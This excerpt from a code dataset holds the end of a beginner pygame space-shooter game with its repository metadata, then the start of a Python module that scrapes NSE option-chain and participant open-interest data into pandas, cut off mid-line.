\n\"\"\"\n\npygame.init() \npygame.mixer.init()\n\nclass Ship:\n def __init__(self, x, y, health):\n self.x = x\n self.y = y\n self.health = health\n self.ship_image = None\n\n def draw(self, screen):\n screen.blit(self.ship_image, (self.x, self.y))\n \nGREEN_SPACE_SHIP = pygame.transform.scale(pygame.image.load(os.path.join(\"spaceshooter_assets\", \"player.png\")), (80,80))\nclass Player(Ship):\n def __init__(self, x, y, health):\n super().__init__(x, y, health)\n self.ship_image = GREEN_SPACE_SHIP\n self.mask = pygame.mask.from_surface(self.ship_image)\n self.max_health = health\n self.lasers = []\n self.rect = self.ship_image.get_rect(topleft=(x, y))\n\nPLAYER_LASER = pygame.transform.scale(pygame.image.load(os.path.join(\"spaceshooter_assets\", \"laser.png\")), (20,20))\nclass Laser:\n def __init__(self, x, y, img):\n self.x = x\n self.y = y\n self.img = img\n self.mask = pygame.mask.from_surface(self.img)\n self.rect = self.img.get_rect(topleft=(self.x, self.y))\n\n def draw(self, screen):\n screen.blit(self.img, (self.x, self.y))\n\n def move(self, y):\n self.y -= y\n self.rect.y = self.y\n\n def check_collision(self, enemies):\n for enemy in enemies:\n enemy_mask = pygame.mask.from_surface(enemy.ship_image)\n offset = (int(enemy.x - self.x), int(enemy.y - self.y))\n\n if self.mask.overlap(enemy_mask, offset):\n return enemy\n\n return None\n \nBOSS_SPACE_SHIP = pygame.transform.scale(pygame.image.load(os.path.join(\"spaceshooter_assets\", \"boss_enemy.png\")), (200, 200)) \nTANK_SPACE_SHIP = pygame.transform.scale(pygame.image.load(os.path.join(\"spaceshooter_assets\", \"tank_enemy.png\")), (110,110)) \nNORMAL_SPACE_SHIP = pygame.transform.scale(pygame.image.load(os.path.join(\"spaceshooter_assets\", \"normal_enemy.png\")), (70,70)) \nFAST_SPACE_SHIP = pygame.transform.scale(pygame.image.load(os.path.join(\"spaceshooter_assets\", \"fast_enemy.png\")), (40,40)) \nclass Enemy(Ship):\n ENEMY_TYPES = {\n \"boss\": BOSS_SPACE_SHIP,\n \"tank\": TANK_SPACE_SHIP,\n \"normal\": NORMAL_SPACE_SHIP,\n \"fast\": FAST_SPACE_SHIP\n }\n\n ENEMY_SPEEDS = {\n \"boss\": 0.4,\n \"tank\": 1, \n \"normal\": 1.2,\n \"fast\": 1.5\n }\n\n def __init__(self, x, y, health, enemy_type):\n super().__init__(x, y, health)\n self.ship_image = self.ENEMY_TYPES[enemy_type]\n self.mask = pygame.mask.from_surface(self.ship_image)\n self.rect = self.ship_image.get_rect(topleft=(self.x, self.y))\n self.speed = self.ENEMY_SPEEDS[enemy_type]\n\n def move(self):\n self.y += self.speed\n self.rect.y = self.y\n \n def take_damage(self, damage):\n self.health -= damage\n\n def is_dead(self):\n return self.health <= 0\n\ndef main():\n\n LASER_SOUND_FILE = \"spaceshooter_assets/laser_sound.mp3\"\n BOSS_BATTLE_SOUND_FILE = \"spaceshooter_assets/boss_sound.mp3\"\n BACKGROUND_SOUND_FILE = \"spaceshooter_assets/background_sound.mp3\"\n BOSS_SPAWN_SOUND_FILE = \"spaceshooter_assets/boss-spawn_sound.mp3\" \n GAME_WON_SOUND = \"spaceshooter_assets/game-won_sound.mp3\"\n GAME_LOST_SOUND = \"spaceshooter_assets/game-over_sound.mp3\"\n\n def play_sound(sound_file, volume=1.0):\n sound = pygame.mixer.Sound(sound_file)\n sound.set_volume(volume)\n sound.play()\n\n WIDTH, HEIGHT = 1000, 800\n FPS = 60\n wave = 0\n enemies = []\n player_velocity = 8\n player_size = 80\n score = 0\n\n main_font = pygame.font.SysFont(\"comicsans\", 30)\n wave_font = pygame.font.SysFont(\"comicsans\", 50)\n white_font_color = ((255,255,255))\n clock = pygame.time.Clock()\n\n # Player ship\n player_ship = Player(WIDTH / 2, HEIGHT - 60, 100)\n\n # Background 
Image\n pygame.display.set_caption(\"Space Invaders\")\n screen = pygame.display.set_mode((WIDTH, HEIGHT))\n image_path = os.path.join(\"spaceshooter_assets\", \"nightsky.png\")\n BG_IMG = pygame.transform.scale(pygame.image.load(image_path), (WIDTH, HEIGHT))\n \n def redraw_window(screen, bg_img):\n screen.blit(bg_img, (0, 0))\n\n #Wave label fade after 3 seconds\n wave_label = wave_font.render(f\"Wave {wave}\", 1, white_font_color)\n current_time = pygame.time.get_ticks()\n \n if 1 <= wave <= 5 and (current_time - start_time <= 3000):\n screen.blit(wave_label, ((WIDTH - wave_label.get_width()) // 2, (HEIGHT - wave_label.get_height()) // 2))\n\n # Game screen info \n health_label = main_font.render(f\"Health: {player_ship.health}\", 1, white_font_color)\n score_label = main_font.render(f\"Score: {score}\", 1, white_font_color)\n screen.blit(health_label, (10, 10))\n screen.blit(score_label, (WIDTH - score_label.get_width() - 10, 10))\n\n # Draw the player ship\n player_ship.draw(screen)\n\n #Update and draw lasers\n for laser in player_ship.lasers[:]:\n laser.draw(screen)\n laser.move(10) \n\n #Remove lasers that hit the top of the screen\n if laser.y < 0:\n player_ship.lasers.remove(laser)\n\n # Update and draw enemies\n for enemy in enemies[:]:\n enemy.draw(screen)\n enemy.move()\n\n #Player loss - remove everything from the screen\n if player_ship.health <= 0:\n enemies.remove(enemy)\n\n #Remove enemies that hit the bottom of the screen and take away health\n if enemy.y > HEIGHT:\n if enemy.ship_image == BOSS_SPACE_SHIP:\n player_ship.health = 0\n enemies.remove(enemy)\n else:\n player_ship.health -= 5\n enemies.remove(enemy)\n\n # Player Win! Draw\n if (len(enemies) == 0 and wave >= 5) and player_ship.health > 0:\n win_label = main_font.render(\"YOU WIN!\", 1, white_font_color)\n screen.blit(win_label, ((WIDTH - win_label.get_width()) // 2, (HEIGHT - win_label.get_height()) // 2))\n # Player Loss! 
Draw\n elif player_ship.health <= 0:\n lost_label = main_font.render(\"GAME OVER!\", 1, white_font_color)\n screen.blit(lost_label, ((WIDTH - lost_label.get_width()) // 2, (HEIGHT - lost_label.get_height()) // 2)) \n\n pygame.display.update()\n\n boss_spawned = False \n running = True\n switch_music = True\n start_time = pygame.time.get_ticks()\n stop_sound = True\n while running:\n clock.tick(FPS)\n current_time = pygame.time.get_ticks()\n redraw_window(screen, BG_IMG)\n\n # Event handler\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n # Player shoots a laser\n play_sound(LASER_SOUND_FILE, 0.2)\n player_laser = Laser(player_ship.x + player_ship.ship_image.get_width() // 2 - PLAYER_LASER.get_width() // 2, player_ship.y, PLAYER_LASER)\n player_ship.lasers.append(player_laser)\n \n # Check for collision with enemies\n for laser in player_ship.lasers[:]:\n hit_enemy = laser.check_collision(enemies)\n if hit_enemy:\n score += 10\n hit_enemy.take_damage(40)\n player_ship.lasers.remove(laser)\n if hit_enemy.is_dead():\n enemies.remove(hit_enemy)\n\n # Enemy Spawner\n if (len(enemies) == 0 and wave < 5) and player_ship.health > 0:\n wave += 1\n start_time = current_time\n\n #Background music switch\n if wave <= 4 and switch_music:\n switch_music = False\n pygame.mixer.music.load(BACKGROUND_SOUND_FILE)\n pygame.mixer.music.set_volume(0.5)\n pygame.mixer.music.play(-1)\n elif wave >= 5:\n pygame.mixer.music.load(BOSS_BATTLE_SOUND_FILE)\n pygame.mixer.music.set_volume(0.5)\n pygame.mixer.music.play(-1)\n \n selectEnemy = [\"tank\", \"normal\", \"fast\"]\n for _ in range(wave * 8):\n enemy_type = random.choice(selectEnemy)\n if enemy_type == \"tank\":\n enemy_health = 120\n elif enemy_type == \"normal\":\n enemy_health = 80\n elif enemy_type == \"fast\":\n enemy_health = 40\n\n enemy = Enemy(random.randint(50, WIDTH - 100), random.randint(-1500, -100), enemy_health, enemy_type)\n enemies.append(enemy)\n elif wave >= 5 and not boss_spawned and player_ship.health > 0:\n #Wave 5 boss\n play_sound(BOSS_SPAWN_SOUND_FILE, 1.0)\n enemy = Enemy(random.randint(50, WIDTH - 100), random.randint(-1500, -100), 4000, \"boss\")\n enemies.append(enemy)\n boss_spawned = True\n \n # Player Wins! Sound\n if (len(enemies) == 0 and wave >= 5) and (player_ship.health > 0) and stop_sound:\n pygame.mixer.music.stop()\n play_sound(GAME_WON_SOUND, 1.0)\n stop_sound = False\n # Player Loss! Sound\n elif player_ship.health <= 0 and stop_sound:\n pygame.mixer.music.stop()\n play_sound(GAME_LOST_SOUND, 1.0)\n stop_sound = False\n \n \"\"\"\n The if statements check both the keys pressed and the player's position. \n For example, it verifies whether a key is pressed and checks if the player is out of bounds before allowing movement. 
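The boundary checks described in this docstring gate each movement key on the resulting position. An equivalent way to reason about them is to move first and clamp afterwards; a tiny self-contained sketch (window constants copied from main(), the starting position is hypothetical):

    def clamp(value, lo, hi):
        # keep a coordinate inside the playable range
        return max(lo, min(hi, value))

    WIDTH, player_size, player_velocity = 1000, 80, 8
    x = 995                                          # near the right edge
    x = clamp(x + player_velocity, 0, WIDTH - player_size)
    print(x)                                         # 920: the move is truncated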
\n This approach enables the creation of a border or play area since we don't want the player to go beyond the screen.\n\n Player controls: WASD or Arrow keys\n Having this in the while loop allows continuous movement while the key is pressed.\n \"\"\"\n\n keys = pygame.key.get_pressed()\n if (keys[pygame.K_a] or keys[pygame.K_LEFT]) and player_ship.x - player_velocity > 0:\n player_ship.x -= player_velocity\n if (keys[pygame.K_d] or keys[pygame.K_RIGHT]) and player_ship.x + player_velocity + player_size < WIDTH:\n player_ship.x += player_velocity\n if (keys[pygame.K_w] or keys[pygame.K_UP]) and player_ship.y - player_velocity - player_size > 0:\n player_ship.y -= player_velocity\n if (keys[pygame.K_s] or keys[pygame.K_DOWN]) and player_ship.y + player_velocity + player_size < HEIGHT:\n player_ship.y += player_velocity\n\n pygame.quit() \n\n# Runs main\nmain()", "repo_name": "KerySeverino/MyPythonProjects", "sub_path": "Beginner_Projects/spaceshooter.py", "file_name": "spaceshooter.py", "file_ext": "py", "file_size_in_byte": 12430, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.init", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.mixer.init", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.mask.from_surface", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.mask", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.mask.from_surface", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.mask", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.mask.from_surface", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.mask", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 75, "usage_type": "attribute"}, {"api_name": 
"os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 76, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 77, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.mask.from_surface", "line_number": 96, "usage_type": "call"}, {"api_name": "pygame.mask", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 120, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 132, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 132, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 133, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 133, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 135, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 135, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 141, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 141, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 142, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 142, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 144, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 144, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 144, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 144, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 151, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 151, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 209, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 209, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 214, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 214, "usage_type": "attribute"}, {"api_name": "pygame.time.get_ticks", "line_number": 218, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 218, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 222, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 222, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 223, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 225, "usage_type": "call"}, {"api_name": 
"pygame.KEYDOWN", "line_number": 226, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 227, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 251, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 251, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.set_volume", "line_number": 252, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 252, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 253, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 253, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 255, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 255, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.set_volume", "line_number": 256, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 256, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 257, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 257, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 261, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 269, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 274, "usage_type": "call"}, {"api_name": "pygame.mixer.music.stop", "line_number": 280, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 280, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.stop", "line_number": 285, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 285, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 298, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 298, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 299, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 299, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 301, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 301, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 303, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 303, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 305, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 305, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 308, "usage_type": "call"}]} +{"seq_id": "39213877094", "text": "import os\nimport concurrent.futures\nimport io\nimport math\nimport json\n\nfrom datetime import datetime,timedelta\nimport pandas as pd\nfrom requests.exceptions import HTTPError\nfrom bs4 import BeautifulSoup\n\nfrom bandl.nse_urls import NseUrls\nfrom bandl.helper import get_formated_date,get_date_range\nfrom bandl.request import RequestUrl\n\n#default params for url connection\nDEFAULT_TIMEOUT = 5 # seconds\nMAX_RETRIES = 3\nINDEX_DATA_LIMIT = 99\nSTOCK_DATA_LIMIT = 240\n#default to last three month\nPART_OI_DAYS = 22*3\n\n#to disable pandas warning\npd.set_option('mode.chained_assignment', None)\n\nclass NseData:\n def __init__(self,timeout=DEFAULT_TIMEOUT,max_retries=MAX_RETRIES):\n self.__nse_urls = NseUrls()\n self.__headers = self.__nse_urls.header\n #create request\n self.__request = RequestUrl(timeout,max_retries)\n\n def get_underlying_val(self,symbol):\n \"\"\"get value of underlying asset\n :param symbol: stock/index symbol\n :type symbol: string\n :raises Exception: NSE connection 
related\n :return: underlying value\n :rtype: integer\n \"\"\"\n try:\n hack = self.__request.get(self.__nse_urls.OC_FIRST_TRY,headers=self.__headers)\n base_oc_url = self.__nse_urls.get_oc_url(symbol)\n page = self.__request.get(base_oc_url,headers=self.__headers)\n oc_json = json.loads(page.text)\n underlying_val = oc_json['records']['underlyingValue']\n return underlying_val\n\n except Exception as err:\n raise Exception(\"something went wrong while reading nse URL :\", str(err))\n\n def get_indices(self):\n \"\"\"To get list of NSE indices\n \"\"\"\n try:\n index_page = self.__request.get(self.__nse_urls.INDEX_URL,headers=self.__headers)\n soup = BeautifulSoup(index_page.text,'lxml')\n table = soup.find(\"select\",{\"id\":\"indexType\"})\n indices_data = table.find_all(\"option\")\n indices = [index.get(\"value\") for index in indices_data if \"NIFTY\" in index.get(\"value\")]\n\n #lets append india vix as well\n indices.append(\"INDIA VIX\")\n return indices\n except Exception as err:\n raise Exception(\"Error occurred while getting NSE indices :\", str(err))\n\n def get_oc_strike_prices(self,symbol,format=True,level=3):\n \"\"\"To get option strike prices, optionally formatted as OTM,ITM,ATM\n\n :param symbol: stock/index symbol\n :type symbol: string\n :param format: format in OTM,ITM,ATM, defaults to True\n :type format: bool, optional\n :param level: level of strike prices for ITM/OTM, defaults to 3\n :type level: int, optional\n :raises Exception: NSE connection related\n :return: strike prices\n :rtype: list/dictionary\n \"\"\"\n try:\n hack = self.__request.get(self.__nse_urls.OC_FIRST_TRY,headers=self.__headers)\n base_oc_url = self.__nse_urls.get_oc_url(symbol)\n page = self.__request.get(base_oc_url,headers=self.__headers)\n oc_json = json.loads(page.text)\n underlying_val = oc_json['records']['underlyingValue']\n strikePrices = oc_json['records']['strikePrices']\n #if normal strike prices are requested then return as is\n if not format:\n return strikePrices\n\n strike_count = len(strikePrices)\n #else lets format in OTM/ITM/ATM\n atm_index= min(range(strike_count), key = lambda i: abs(strikePrices[i]-underlying_val))\n strikes = {\"ATM\":strikePrices[atm_index],\"ITM\":[],\"OTM\":[]}\n for index in range(level):\n if index + atm_index < strike_count -1:\n strikes[\"OTM\"].append(strikePrices[index+atm_index+1])\n if atm_index - index > 1:\n strikes[\"ITM\"].append(strikePrices[atm_index-index-1])\n return strikes\n\n except Exception as err:\n raise Exception(\"something went wrong while fetching nse :\", str(err))\n\n def get_oc_exp_dates(self,symbol):\n\n \"\"\"get current available expiry dates\n\n :param symbol: stock/index symbol\n :type symbol: string\n :raises Exception: NSE connection related\n :return: expiry dates\n :rtype: list\n \"\"\"\n try:\n hack = self.__request.get(self.__nse_urls.OC_FIRST_TRY,headers=self.__headers)\n base_oc_url = self.__nse_urls.get_oc_url(symbol)\n page = self.__request.get(base_oc_url,headers=self.__headers)\n oc_json = json.loads(page.text)\n expiry_dates = oc_json['records']['expiryDates']\n return expiry_dates\n\n except Exception as err:\n raise Exception(\"something went wrong while fetching nse :\", str(err))\n\n def get_option_data(self,symbol,expiry_date=None,strikes=None):\n \"\"\"get option data\n\n :param symbol: stock/index symbol\n :type symbol: string\n :param expiry_date: expiry date (all date formats accepted), defaults to next near\n :type expiry_date: string, optional\n :param strikes: Dictionary having OTM,ITM,ATM strikes, 
defaults to None\n :type strikes: Dictionary, optional\n :raises Exception: Connection related\n :return: underlying_val, option data\n :rtype: pair\n \"\"\"\n try:\n hack = self.__request.get(self.__nse_urls.OC_FIRST_TRY,headers=self.__headers)\n base_oc_url = self.__nse_urls.get_oc_url(symbol)\n page = self.__request.get(base_oc_url,headers=self.__headers)\n oc_json = json.loads(page.text)\n underlying_val = oc_json['records']['underlyingValue']\n if not expiry_date:\n oc_data = oc_json['filtered']['data']\n oc_mapped_data = {}\n for eachData in oc_data:\n strikePrice = eachData.get(\"strikePrice\")\n if(strikes):\n if (strikePrice == strikes[\"ATM\"]\n or strikePrice in strikes[\"ITM\"]\n or strikePrice in strikes[\"OTM\"]):\n oc_mapped_data[strikePrice] = {\"CE\":eachData.get(\"CE\"),\"PE\":eachData.get(\"PE\")}\n else:\n oc_mapped_data[strikePrice] = {\"CE\":eachData.get(\"CE\"),\"PE\":eachData.get(\"PE\")}\n return underlying_val,oc_mapped_data\n except Exception as err:\n raise Exception(\"something went wrong while fetching nse :\", str(err))\n\n\n\n def get_option_chain_df(self, symbol, expiry_date=None,dayfirst=False):\n \"\"\" This function fetches option chain data from NSE and returns in pandas.DataFrame\n\n :param symbol: stock/index symbol\n :type symbol: string\n :param expiry_date: expiry date (all date formats accepted), defaults to next near\n :type expiry_date: string\n :param dayfirst: True if date format is European style DD/MM/YYYY, defaults to False\n :type dayfirst: bool, optional\n :raises Exception: NSE connection related\n :raises Exception: In html parsing\n :return: option chain\n :rtype: pandas.DataFrame\n \"\"\"\n try:\n if not expiry_date:\n expiry_date = self.get_oc_exp_dates(symbol)[0]\n\n oc_url = self.__nse_urls.get_option_chain_url(symbol, expiry_date,dayfirst)\n # If the response was successful, no Exception will be raised\n oc_page = self.__request.get(oc_url, headers = self.__headers)\n\n except Exception as err:\n raise Exception(\"Error occurred while connecting NSE :\", str(err))\n else:\n try:\n dfs = pd.read_html(oc_page.text)\n return dfs[1]\n except Exception as err:\n raise Exception(\"Error occurred while reading html :\", str(err))\n\n def __get_file_path(self, file_name, file_path = None, is_use_default_name = True):\n \"\"\"Construct the output file path for saved data.\n\n :param file_name: file name\n :type file_name: string\n :param file_path: file directory or file path , defaults to None\n :type file_path: string, optional\n :param is_use_default_name: to get filename in current timestamp, defaults to True\n :type is_use_default_name: bool, optional\n :return: file path\n :rtype: string\n \"\"\"\n try:\n if not file_path:\n file_path = os.getcwd()\n\n if os.path.isfile(file_path):\n if (not is_use_default_name):\n return file_path\n # if need to use default file path, we get parent path\n else:\n file_path = os.path.dirname(file_path)\n\n # datetime object containing current date and time\n now = datetime.now()\n # filename timestamp, e.g. 05_March_14_30\n dt_string = now.strftime(\"%d_%B_%H_%M\")\n file_name = file_name + \"_\" + dt_string + \".xlsx\"\n\n excel_path = os.path.join(file_path, file_name)\n return excel_path\n except Exception as err:\n print(\"Error while naming file. 
Error: \", str(err))\n\n def get_option_chain_excel(self, symbol, expiry_date=None,dayfirst=False,file_path = None, is_use_default_name = True):\n \"\"\"Fetches NSE option chain data and returns in the form of excel (.xlsx)\n\n :param symbol: stock/index symbol\n :type symbol: string\n :param expiry_date: expiry date (all date formats accepted), defaults to next near\n :type expiry_date: string\n :param dayfirst: True if date format is european style DD/MM/YYYY, defaults to False\n :type dayfirst: bool, optional\n :param file_path: file/folder path, defaults to None\n :type file_path: string, optional\n :param is_use_default_name: to get filename as current timestamp, defaults to True\n :type is_use_default_name: bool, optional\n :raises Exception: NSE connection related\n \"\"\"\n try:\n if not expiry_date:\n expiry_date = self.get_oc_exp_dates(symbol)[0]\n\n df = self.get_option_chain_df(symbol, expiry_date,dayfirst)\n file_name = symbol + \"_\" + expiry_date\n excel_path = self.__get_file_path(file_name, file_path, is_use_default_name)\n\n df.to_excel(excel_path, file_name)\n except Exception as err:\n raise Exception(\"Error occurred while getting excel :\", str(err))\n\n def __join_part_oi_dfs(self,df_join,df_joiner):\n \"\"\"will append joiner to join for oi_dfs\n\n :param df_join: Dictionary of participants\n :type df_join: dict\n :param df_joiner: Dictionary of participants\n :type df_joiner: dict\n \"\"\"\n for client in df_join:\n df_join[client] = self.__join_dfs(df_join[client],df_joiner[client]).sort_index()\n\n def __join_dfs(self,join,joiner):\n \"\"\"will append joiner to join for oi_dfs\n\n :param join: df which will be appended\n :type join: pandas.DataFrame\n :param joiner: df which we want to append\n :type joiner: pandas.DataFrame\n :return: merged data frame\n :rtype: pandas.DataFrame\n \"\"\"\n return join.append(joiner)\n\n def get_part_oi_df(self,start=None,end=None,periods=None,dayfirst=False,workers=None):\n \"\"\"Return dictionary of participants containing data frames\n\n :param start: start date , defaults to None\n :type start: string, optional\n :param end: end date, defaults to None\n :type end: string, optional\n :param periods: number of days, defaults to None\n :type periods: interger, optional\n :param dayfirst: True if date format is european style DD/MM/YYYY, defaults to False\n :type dayfirst: bool, optional\n :param workers: Number of threads for requesting nse, defaults to None\n :type workers: interger, optional\n :raises Exception: NSE Connection/Request overload\n :return: participant wise open interest\n :rtype: pandas.DataFrame\n \"\"\"\n try:\n #format date just in case\n if start:\n start = get_formated_date(start,dayfirst=dayfirst)\n if end:\n end = get_formated_date(end,dayfirst=dayfirst)\n\n #if both none, we set end to today\n if not start and not end:\n end = get_formated_date()\n if not periods:\n periods = PART_OI_DAYS\n #get urls for these days\n dates = pd.date_range(start=start,end=end, periods=periods,freq='B')\n url_date = [(self.__nse_urls.get_participant_oi_url(date),date) for date in dates]#\n\n oi_clm = self.__nse_urls.PART_OI_CLM\n #lets preinitialize, better readability\n oi_dfs = { \"Client\":pd.DataFrame(columns=oi_clm,index=dates),\n \"DII\":pd.DataFrame(columns=oi_clm,index=dates),\n \"FII\":pd.DataFrame(columns=oi_clm,index=dates),\n \"Pro\":pd.DataFrame(columns=oi_clm,index=dates),\n \"TOTAL\":pd.DataFrame(columns=oi_clm,index=dates)\n }\n\n if not workers:\n workers = os.cpu_count() * 2\n\n with 
concurrent.futures.ThreadPoolExecutor(max_workers=workers) as executor:\n responses = {executor.submit(self.__request.get, url,self.__headers): date for url,date in url_date}\n for res in concurrent.futures.as_completed(responses):\n date = responses[res]\n try:\n csv = res.result()\n except Exception as exc:\n #might be holiday\n pass\n else:\n df = pd.read_csv(io.StringIO(csv.content.decode('utf-8')))\n #drop the first header\n df_header = df.iloc[0]\n #is there any in-place way?\n df = df[1:]\n df.columns = df_header\n df.set_index('Client Type',inplace=True)\n #let us create data frames for all client types\n oi_dfs['Client'].loc[date] = df.loc['Client']\n oi_dfs['FII'].loc[date] = df.loc['FII']\n oi_dfs['DII'].loc[date] = df.loc['DII']\n oi_dfs['Pro'].loc[date] = df.loc['Pro']\n oi_dfs['TOTAL'].loc[date] = df.loc['TOTAL']\n\n if not oi_dfs['Client'].empty:\n #remove nan row\n for client in oi_dfs:\n oi_dfs[client].dropna(inplace=True)\n\n #if holidays occurred on business days, let's retrieve more data equivalent to the holidays.\n if oi_dfs['Client'].shape[0] < periods:\n new_periods = periods - oi_dfs['Client'].shape[0]\n try:\n #if only start, find till today\n if start and (not end):\n s_from = oi_dfs['Client'].index[-1] + timedelta(1)\n e_till = None\n #if not start, can go to past\n elif(end and (not start)):\n s_from = None\n e_till = oi_dfs['Client'].index[0] - timedelta(1)\n #if start and end, no need to change\n else:\n return oi_dfs\n except IndexError as err:\n raise Exception(\"NSE access error. Size down the request or clean cookies to resolve the issue.\")\n except Exception as exc:\n raise Exception(\"participant OI error: \",str(exc))\n\n oi_dfs_new = self.get_part_oi_df(start = s_from,end = e_till,periods = new_periods)\n self.__join_part_oi_dfs(oi_dfs,oi_dfs_new)\n\n return oi_dfs\n\n except Exception as err:\n raise Exception(\"Error occurred while getting part_oi :\", str(err))\n\n def __parse_indexdata(self,res_txt,symbol):\n dfs = pd.read_html(res_txt)[0]\n if dfs.shape[0] <2:\n raise Exception(\"No record found\")\n if \"NIFTY\" in symbol:\n fined_dfs = dfs.iloc[0:]\n fined_dfs.columns = 